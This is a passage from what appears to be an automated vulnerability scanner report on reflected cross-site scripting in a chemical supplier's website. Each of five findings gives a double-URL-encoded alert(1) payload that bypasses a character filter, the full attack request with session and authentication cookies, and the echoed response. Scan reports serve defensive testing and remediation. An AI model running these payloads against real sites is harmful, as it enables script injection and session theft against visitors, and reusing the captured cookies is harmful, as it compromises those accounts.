bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:42 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news5afdd";alert(1)//7f530c62bdf","E404") ;
   </script>
...[SNIP]...

1.456. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61734%2522%253balert%25281%2529%252f%252f07b5490f80a was submitted in the REST URL parameter 1. This input was echoed as 61734";alert(1)//07b5490f80a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc61734%2522%253balert%25281%2529%252f%252f07b5490f80a/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:32 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc61734";alert(1)//07b5490f80a/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon","E404") ;
   </script>
...[SNIP]...

1.457. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1431c%2522%253balert%25281%2529%252f%252f3a483d708bd was submitted in the REST URL parameter 2. This input was echoed as 1431c";alert(1)//3a483d708bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib1431c%2522%253balert%25281%2529%252f%252f3a483d708bd/sigma-aldrich/images/online-catalog/chromatogram-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:34 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib1431c";alert(1)//3a483d708bd/sigma-aldrich/images/online-catalog/chromatogram-icon","E404") ;
   </script>
...[SNIP]...

1.458. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2d9c%2522%253balert%25281%2529%252f%252f71ef9625030 was submitted in the REST URL parameter 3. This input was echoed as d2d9c";alert(1)//71ef9625030 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrichd2d9c%2522%253balert%25281%2529%252f%252f71ef9625030/images/online-catalog/chromatogram-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:37 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrichd2d9c";alert(1)//71ef9625030/images/online-catalog/chromatogram-icon","E404") ;
   </script>
...[SNIP]...

1.459. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d789%2522%253balert%25281%2529%252f%252f10c02fb1132 was submitted in the REST URL parameter 4. This input was echoed as 3d789";alert(1)//10c02fb1132 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images3d789%2522%253balert%25281%2529%252f%252f10c02fb1132/online-catalog/chromatogram-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:40 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images3d789";alert(1)//10c02fb1132/online-catalog/chromatogram-icon","E404") ;
   </script>
...[SNIP]...

1.460. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea66d%2522%253balert%25281%2529%252f%252f0e85a483f8f was submitted in the REST URL parameter 5. This input was echoed as ea66d";alert(1)//0e85a483f8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/online-catalogea66d%2522%253balert%25281%2529%252f%252f0e85a483f8f/chromatogram-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
